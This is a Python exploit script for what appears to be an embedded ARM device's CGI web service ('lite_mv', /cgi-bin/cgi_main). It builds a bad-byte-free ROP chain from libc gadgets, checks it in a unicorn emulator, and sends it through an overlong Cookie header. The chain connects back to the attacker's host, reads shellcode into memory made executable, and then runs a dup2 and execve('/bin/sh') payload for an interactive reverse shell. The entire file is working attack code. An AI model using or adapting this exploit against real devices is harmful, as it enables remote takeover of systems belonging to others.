#!/usr/bin/env python3

from pwn import context, flat, fit, remote, listen, constants, shellcraft, asm
from dataclasses import dataclass
import socket
import sys
import lief
import unicorn
import unicorn.arm_const as uarm
import capstone
import capstone.arm_const as carm
import z3
import argparse


context(arch='arm', endian='little', os='linux', log_level='error')

GARBAGE = 0xdeadbeef
BREAK   = 0xc0debabe

LIBC_BASE_HOME = 0xb6852000 # The one on my VM
LIBC_BASE = LIBC_BASE_HOME

page_down = lambda x: x & ~0xfff
page_up = lambda x: page_down(x + 4096 - 1)
page_off = lambda x: x & 0xfff

bad_bytes = ( 0,1,2,3,4,5,6,7,8,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 )

def add_up_to(n):
    s = z3.Solver()
    a = z3.BitVec("a", 32)
    b = z3.BitVec("b", 32)
    s.add((a + b) == n)
    for bad in bad_bytes:
        for n in (a, b):
            for i in range(4):
                s.add(((n >> (i * 8)) & 0xff) != bad)

    if s.check() != z3.sat:
        raise Exception("Unsatisfiable")
    m = s.model()
    a = m.evaluate(a)
    b = m.evaluate(b)
    return (a.as_long(), b.as_long())

def sockaddr_in(ip: str, port: int) -> bytes:
    a = socket.AF_INET | (socket.htons(port & 0xffff) << 16)
    b = socket.inet_pton(socket.AF_INET, ip)
    return a.to_bytes(4, 'little') + b

def check(bytes_to_check):
    if type(bytes_to_check) == int:
        bytes_to_check = bytes_to_check.to_bytes(4, 'little')
    for b in bad_bytes:
        if b in bytes_to_check:
            return False
    return True

def check_fail(bytes_to_check):
    if type(bytes_to_check) == int:
        bytes_to_check = bytes_to_check.to_bytes(4, 'little')
    for b in bad_bytes:
        if b in bytes_to_check:
            raise Exception(f"Found a {b:02x}")
    return bytes_to_check

@dataclass
class Host():
    addr: str
    port: int

    def parse(string: str) -> "Host":
        parts = string.split(':')
        return Host(addr=parts[0], port=int(parts[1]))

class Gadgets(object):
    def __init__(self, libc_base):
        self.libc_base = libc_base
        self.db = {k: (v[0] + libc_base, v[1]) for k, v in {
                'MPROTECT':         (0x000ca270, 'mprotect'),
                'READ':             (0x000bd690, 'read'),
                'ADD_R0_R3':        (0x00017fc0, 'add r0, r0, r3 ; pop {lr} ; bx lr'),
                'ADD_R3_R0_R3':     (0x00095b50, 'add r3, r0, r3 ; sub r0, fp, #0x34 ; blx r5'),
                'BX_R3':            (0x00017e9c, 'bx r3'),
                'MOV_R0_R4':        (0x0002bbf0, 'mov r0, r4 ; pop {r4, lr} ; bx lr'),
                'MOV_R1_R3':        (0x000185c8, 'mov r1, r3 ; add sp, sp, #8 ; pop {r4, lr} ; bx lr'),
                'MOV_R2_R0':        (0x000d77c8, 'mov r2, r0 ; ldr r0, [pc, #0x3fc] ; moveq r0, ip ; blx r3'),
                'MOV_R4_R0':        (0x000e2dc8, 'mov r4, r0 ; add r0, sp, #0xc8 ; blx r3'),
                'POP_HIGH':         (0x00017e98, 'pop {r4, r5, r6, lr} ; bx r3'),
                'POP_LOW':          (0x00107fb0, 'pop {r0, r1, r2, r3, pc}'),
                'POP_R0':           (0x0010796c, 'pop {r0, pc}'),
                'POP_R3':           (0x00018ba0, 'pop {r3, lr} ; bx lr'),
                'POP_R4_R5':        (0x001071b8, 'pop {r4, r5, pc}'),
                'STR_R0_R3':        (0x000c7684, 'str r0, [r3] ; pop {r3, lr} ; bx lr')
            }.items()
        }
        for k, v in self.db.items():
            try:
                check_fail(v[0].to_bytes(4, 'little'))
            except Exception as e:
                print(f"Bad gadget: {k} - {v[1]} - {e} - 0x{v[0]:08x}")
                sys.exit(-1)

        # Add the known bad ones
        self.db['SOCKET'] = (libc_base + 0x000cf0c0, 'socket')
        self.db['CONNECT'] = (libc_base + 0x000cebe0, 'connect')

    def call(self, func: int, r0: int, r1: int, r2: int, next_gadget: int) -> tuple[int,bytes]:
        r0_1, r0_2 = add_up_to(r0)
        r1_1, r1_2 = add_up_to(r1)
        r2_1, r2_2 = add_up_to(r2)

        first_gadget = self.POP_LOW
        callsite_modifier = b""

        if check(func) == False:
            # Function contains bad bytes. Prepend chain that sets it
            first_gadget = self.POP_R4_R5
            func_1, func_2 = add_up_to(func)
            offset_1, offset_2 = add_up_to(0xffffffbc)
            func = 0x44444444
            callsite_modifier = flat([
                # Gadget 1 : pop {r4, r5, pc}
                GARBAGE,  # r4
                self.MOV_R0_R4, # r5 - Gadget 12
                self.POP_R0,    # pc - Gadget 2
                # Gadget 2 : pop {r0, pc}
                func_1,   # r0
                self.POP_R3,  # pc - Gadget 3
                # Gadget 3 : pop {r3, lr} ; bx lr
                func_2,   # r3
                self.ADD_R0_R3, # lr - Gadget 4
                # Gadget 4 : add r0, r0, r3 ; pop {lr} ; bx lr
                self.POP_R3, # lr - Gadget 5
                # Gadget 5 : pop {r3, lr} ; bx lr
                self.POP_R3,    # r3 - Gadget 8
                self.MOV_R4_R0, # lr - Gadget 7
                # Gadget 7 : mov r4, r0 ; add r0, sp, #0xc8 ; blx r3
                # Gadget 8 : pop {r3, lr} ; bx lr
                offset_1, # r3
                self.ADD_R0_R3,    # lr - Gadget 9
                # Gadget 9 : add r0, r0, r3 ; pop {lr} ; bx lr
                self.POP_R3,  # lr - Gadget 10
                # Gadget 10 : pop {r3, lr} ; bx lr
                offset_2, # r3
                self.ADD_R3_R0_R3, # lr - Gadget 11
                # Gadget 11 : add r3, r0, r3 ; sub r0, fp, #0x34 ; blx r5
                # Gadget 12 : mov r0, r4 ; pop {r4, lr} ; bx lr
                GARBAGE,  # r4
                self.STR_R0_R3, # lr - Gadget 13
                # Gadget 13 : str r0, [r3] ; pop {r3, lr} ; bx lr
                GARBAGE, # r3
                self.POP_LOW,  # lr - Gadget 14
            ])


        return (
            first_gadget,
            flat([
                callsite_modifier,
                # First set r2
                # Gadget 1 : pop {r0, r1, r2, r3, pc}
                r2_1,        # r0
                GARBAGE,  # r1
                GARBAGE,  # r2
                r2_2,        # r3
                self.ADD_R0_R3, # pc - Gadget 2
                # Gadget 2 : add r0, r0, r3 ; pop {lr} ; bx lr
                self.POP_R3,  # lr - Gadget 3
                # Gadget 3 : pop {r3, lr} ; bx lr
                self.POP_R0,    # r3 - Gadget 5
                self.MOV_R2_R0, # lr - Gadget 4
                # Gadget 4 : mov r2, r0 ; ldr r0, [pc, #0x3fc] ; moveq r0, ip ; blx r3

                # Next set r1
                # Gadget 5 : pop {r0, pc}
                r1_1,      # r0
                self.POP_R3,  # pc - Gadget 6
                # Gadget 6 : pop {r3, lr} ; bx lr
                r1_2,        # r3
                self.POP_R4_R5, # lr - Gadget 7
                # Gadget 7 : pop {r4, r5, pc}
                GARBAGE,     # r4
                self.MOV_R1_R3,    # r5 - Gadget 9
                self.ADD_R3_R0_R3, # pc - Gadget 8
                # Gadget 8 : add r3, r0, r3 ; sub r0, fp, #0x34 ; blx r5
                # Gadget 9 : mov r1, r3 ; add sp, sp, #8 ; pop {r4, lr} ; bx lr
                GARBAGE,  # Skipped
                GARBAGE,  # Skipped
                GARBAGE,  # r4
                self.POP_R0,    # lr - Gadget 10

                # Last set r0
                # Gadget 10 : pop {r0, pc}
                r0_1,     # r0
                self.POP_R3, # pc - Gadget 11
                # Gadget 11 : pop {r3, lr} ; bx lr
                r0_2,        # r3
                self.ADD_R0_R3, # lr - Gadget 12
                # Gadget 12 : add r0, r0, r3 ; pop {lr} ; bx lr
                self.POP_R3,   # lr : Gadget 13
                # Gadget 13 : pop {r3, lr} ; bx lr
                func,        # r3 - Gadget 15
                self.POP_HIGH,  # lr - Gadget 14
                # Gadget 14 : pop {r4, r5, r6, lr} ; bx r3
                GARBAGE,   # r4
                GARBAGE,   # r5
                GARBAGE,   # r6
                next_gadget,   # lr - Gadget 15
                # Gadget 15 : func(r0, r1, r2)
            ])
        )

    def poke(self, what: bytes, where: int, next_gadget: int) -> tuple[int,bytes]:
        res = []
        l = (len(what) + 3) & ~3
        what = what + b'\0' * (l - len(what))
        what = [int.from_bytes(what[i:i+4], 'little') for i in range(0, l, 4)]
        for i in range(len(what) - 1, -1, -1):
            chain = self._write_what_where(what[i], where + i * 4, next_gadget)
            res.append(chain[1])
            next_gadget = chain[0]

        return (next_gadget, b"".join(w for w in res[-1::-1]))


    def _write_what_where(self, what: int, where: int, next_gadget: int) -> tuple[int,bytes]:
        what_1, what_2 = add_up_to(what)
        where_1, where_2 = add_up_to(where)
        return (
            self.POP_R4_R5, # The gadget that gets the ball rolling...Gadget 1
            flat([
                # Gadget 1 : pop {r4, r5, pc}
                GARBAGE,  # r4
                self.MOV_R0_R4, # r5 - Gadget 10
                self.POP_R0,    # pc - Gadget 2
                # Gadget 2 : pop {r0, pc}
                what_1,      # r0
                self.POP_R3,    # pc - Gadget 3
                # Gadget 3 : pop {r3, lr} ; bx lr
                what_2,      # r3
                self.ADD_R0_R3, # lr - Gadget 4
                # Gadget 4 : add r0, r0, r3 ; pop {lr} ; bx lr
                self.POP_R3, # lr - Gadget 5
                # Gadget 5 : pop {r3, lr} ; bx lr
                self.POP_LOW,    # r3 - Gadget 8
                self.MOV_R4_R0, # lr - Gadget 7
                # Gadget 7 : mov r4, r0 ; add r0, sp, #0xc8 ; blx r3

                # Gadget 8 : pop {r0, r1, r2, r3, pc}
                where_1,        # r0
                GARBAGE,     # r1
                GARBAGE,     # r2
                where_2,        # r3
                self.ADD_R3_R0_R3, # pc - Gadget 9
                # Gadget 9 : add r3, r0, r3 ; sub r0, fp, #0x34 ; blx r5
                # Gadget 10 : mov r0, r4 ; pop {r4, lr} ; bx lr
                GARBAGE,  # r4
                self.STR_R0_R3, # lr - Gadget 11
                # Gadget 11 - str r0, [r3] ; pop {r3, lr} ; bx lr
                GARBAGE,  # r3
                next_gadget  # lr - Next gadget
        ]))

    def jump_to(self, addr: int) -> tuple[int, bytes]:
        addr_1, addr_2 = add_up_to(addr)
        return (
            self.POP_R4_R5,
            flat([
                # Gadget 1 : pop {r4, r5, pc}
                GARBAGE,  # r4
                self.BX_R3,  # r5 - Gadget 5
                self.POP_R0, # pc - Gadget 2
                # Gadget 2 : pop {r0, pc}
                addr_1,      # r0
                self.POP_R3, # pc - Gadget 3
                # Gadget 3 : pop {r3, lr} ; bx lr
                addr_2,            # r3
                self.ADD_R3_R0_R3, # lr - Gadget 4
                # Gadget 4 - add r3, r0, r3 ; sub r0, fp, #0x34 ; blx r5
                # Gadget 5 - bx r3
            ])
        )

    def connect_to_shellcode(self, host: Host) -> bytes:
        addr = 0x10000
        jmp = self.jump_to(addr)
        read = self.call(self.READ, 3, addr, 4096 * 2, jmp[0])
        connect = self.call(self.CONNECT, 3, addr, 16, read[0])
        sockaddr = self.poke(sockaddr_in(host.addr, host.port), addr, connect[0])
        socket = self.call(self.SOCKET, int(constants.AF_INET), int(constants.SOCK_STREAM), 0, sockaddr[0])
        mprotect = self.call(self.MPROTECT, addr, 4096 * 2, 7, socket[0])

        return flat([
            mprotect[0],
            mprotect[1],
            socket[1],
            sockaddr[1],
            connect[1],
            read[1],
            jmp[1]
        ])

    def __getattr__(self, s):
        if s not in self.db:
            raise Exception(f"No such gadget: {s}")
        return self.db[s][0]

class Emulator(object):
    def __init__(self, gadgets: Gadgets):
        self.STACK = 0xbefff000
        self.verbosity = 2
        self.g = gadgets
        main = lief.parse('./lite_mv')
        libc = lief.parse('./libc-2.15.so')
        u = unicorn.Uc(unicorn.UC_ARCH_ARM, unicorn.UC_MODE_ARM)
        self.main_addr = 0

        # Load main binary
        for s in main.segments:
            if s.type == lief.ELF.SEGMENT_TYPES.LOAD:
                b = bytes(s.content)
                addr = page_down(s.virtual_address)
                size = page_up(s.virtual_size + page_off(s.virtual_address))
                u.mem_map(addr, size)
                u.mem_write(s.virtual_address, b)
                if self.main_addr == 0:
                    self.main_addr = addr

        # Load libc
        for s in libc.segments:
            if s.type == lief.ELF.SEGMENT_TYPES.LOAD:
                b = bytes(s.content)
                addr = page_down(gadgets.libc_base + s.virtual_address)
                size = page_up(s.virtual_size + page_off(s.virtual_address))
                u.mem_map(addr, size)
                u.mem_write(gadgets.libc_base + s.virtual_address, b)

        # Have a stack
        u.mem_map(self.STACK, 4096*3)

        # And a hook
        u.hook_add(unicorn.UC_HOOK_CODE, self.unicorn_code_hook)

        c = capstone.Cs(capstone.CS_ARCH_ARM, capstone.CS_MODE_ARM)
        c.detail = True

        self.u = u
        self.c = c
        self.libc = libc

    def regs(self):
        return {
            'r0': self.u.reg_read(uarm.UC_ARM_REG_R0),
            'r1': self.u.reg_read(uarm.UC_ARM_REG_R1),
            'r2': self.u.reg_read(uarm.UC_ARM_REG_R2),
            'r3': self.u.reg_read(uarm.UC_ARM_REG_R3),
            'r4': self.u.reg_read(uarm.UC_ARM_REG_R4),
            'r5': self.u.reg_read(uarm.UC_ARM_REG_R5),
            'r6': self.u.reg_read(uarm.UC_ARM_REG_R6),
            'r7': self.u.reg_read(uarm.UC_ARM_REG_R7),
            'r8': self.u.reg_read(uarm.UC_ARM_REG_R8),
            'r12': self.u.reg_read(uarm.UC_ARM_REG_R12),
            'ip': self.u.reg_read(uarm.UC_ARM_REG_IP),
            'lr': self.u.reg_read(uarm.UC_ARM_REG_LR),
            'pc': self.u.reg_read(uarm.UC_ARM_REG_PC),
            'sp': self.u.reg_read(uarm.UC_ARM_REG_SP)
        }

    def regs_str(self):
        r = self.regs()
        return " ".join(f"{k}=0x{v:08x}" for k, v in r.items())

    def unicorn_code_hook(self, u, address, size, user):
        i = next(self.c.disasm(u.mem_read(address, 4), address, 1))
        r = f" # {self.regs_str()}"
        if self.verbosity > 1:
            print(f"0x{address:08x}   {i.mnemonic:4s} {i.op_str:15s}{r if self.verbosity > 2 else ''}")
        if i.id == carm.ARM_INS_SVC:
            regs = self.regs()
            if regs['r7'] == int(constants.SYS_socket):
                if self.verbosity > 0:
                    print(f"syscall socket({regs['r0']}, {regs['r1']}, {regs['r2']})")
                # Set return value from socket call
                u.reg_write(uarm.UC_ARM_REG_R0, 3)
            elif regs['r7'] == int(constants.SYS_mprotect):
                if self.verbosity > 0:
                    print(f"syscall mprotect(0x{regs['r0']:08x}, {regs['r1']}, {regs['r2']})")
                # Set return value from mprotect call
                u.reg_write(uarm.UC_ARM_REG_R0, 0)
            elif regs['r7'] == int(constants.SYS_read):
                # Set return value from read call
                if self.verbosity > 0:
                    print(f"syscall read({regs['r0']}, 0x{regs['r1']:08x}, {regs['r2']})")
                addr = regs['r1']
                # Provide a shellcode that prints and exits
                msg = "Shellcode is executing"
                u.mem_write(addr, asm(
                    f"""
                    mov r0, 1
                    adr r1, message
                    mov r2, {len(msg)}
                    mov r7, SYS_write
                    svc #0

                    {shellcraft.exit(0)}

                    message: .ascii \"{msg}\"
                    """
                ))
                u.reg_write(uarm.UC_ARM_REG_R0, 104)
            elif regs['r7'] == int(constants.SYS_write):
                if self.verbosity > 0:
                    addr = regs['r1']
                    size = regs['r2']
                    s = u.mem_read(addr, size).decode('utf8')
                    print(f"syscall write({regs['r0']}, \"{s}\", {regs['r2']})")
            elif regs['r7'] == int(constants.SYS_connect):
                # Set return value from read call
                if self.verbosity > 0:
                    addr = regs['r1']
                    size = regs['r2']
                    sockaddr = u.mem_read(addr, size)
                    fam = int.from_bytes(sockaddr[:2], 'little')
                    port = int.from_bytes(sockaddr[2:4], 'big')
                    ip = socket.inet_ntoa(sockaddr[4:8])
                    print(f"syscall connect({regs['r0']}, 0x{regs['r1']:08x} {{family: {fam}, host: \"{ip}\", port: {port}}}, {regs['r2']})")
                u.reg_write(uarm.UC_ARM_REG_R0, 104)
            elif regs['r7'] == int(constants.SYS_exit):
                # We reached the shellcode
                if self.verbosity > 0:
                    print(f"syscall exit({regs['r0']})")

                u.emu_stop()
                return
            else:
                print(f"syscall {regs['r7']}({regs['r0']}, 0x{regs['r1']:08x}, {regs['r2']})")
            # Skip svc instruction
            u.reg_write(uarm.UC_ARM_REG_PC, u.reg_read(uarm.UC_ARM_REG_PC) + 4)

    def run_rop_chain(self, chain):
        self.u.mem_write(self.STACK + 4096 + 4, chain)

        POP_R0_PC = self.g.libc_base + 0x0010796c # pop {r0, pc}
        self.u.reg_write(uarm.UC_ARM_REG_SP, self.STACK + 4096)
        try:
            self.u.emu_start(POP_R0_PC, 0xffffffff)
        except unicorn.UcError as u:
            if self.verbosity > 0:
                print(f"{u}")
                print(self.regs_str())
                sp = self.regs()['sp'] & ~0xf - (16 * 8)
                for i in range(20):
                    sys.stdout.write(f"{sp + i * 4 * 4:08x}  ")
                    for j in range(4):
                        n = int.from_bytes(self.u.mem_read(sp + i * 4 * 4 + j * 4, 4), 'little')
                        sys.stdout.write(f"{n:08x} ")
                    sys.stdout.write("\n")

class Exploit(object):
    def __init__(self, libc_base):
        self.gadgets = Gadgets(libc_base)

    def emulate(self, local_host: Host, verbosity: int=2):
        emulator = Emulator(self.gadgets)
        emulator.verbosity = verbosity
        chain = self.gadgets.connect_to_shellcode(local_host)
        emulator.run_rop_chain(chain)

    def exploit(self, remote_host: Host, local_host: Host):
        chain = self.gadgets.connect_to_shellcode(local_host)
        payload = asm(
                shellcraft.dup2(0, 40) +
                shellcraft.dup2(1, 41) +
                shellcraft.dup2(2, 42) +
                shellcraft.dupio(3) + """

            execve_shell:
                adr r0, shell
                mov r2, #0

                push {r0, r2}
                mov r1, sp

                mov r7, SYS_execve
                svc #0

            shell: .ascii "/bin/sh\\0"

                """
        )
        l = listen(local_host.port)
        r = remote(remote_host.addr, remote_host.port)
        r.send(flat([
            b"GET /cgi-bin/cgi_main?cmd=abc HTTP/1.1\r\n",
            b"Host: stuff\r\n",
            b"Cookie: PHPSESSID=",
            check_fail(fit({
                170: chain,
            })),

            b"XXXXXXXXXXXXXXXXXXXXXXX",
            b"\r\n\r\n",
        ]))
        l.wait_for_connection()
        l.send(payload)
        l.interactive()

parser = argparse.ArgumentParser(add_help=True)
parser.add_argument('-c', '--libc-base', default=LIBC_BASE, type=int, help=f"Libc base address. Tested with 0x{LIBC_BASE_HOME:08x}")
parser.add_argument('-r', '--remote', help='Remote host and port')
parser.add_argument('-l', '--local', help='Local host and port')
parser.add_argument('-v', '--verbosity', type=int, default=1, help='Emulation verbosity. 0-3')
sub = parser.add_subparsers(dest='sub')
emulate = sub.add_parser('emulate')
emulate = sub.add_parser('exploit')

args = parser.parse_args()

e = Exploit(args.libc_base)
local_host = Host.parse(args.local)

if args.sub == 'emulate':
    e.emulate(local_host, args.verbosity)
elif args.sub == 'exploit':
    remote_host = Host.parse(args.remote)
    e.exploit(remote_host, local_host)
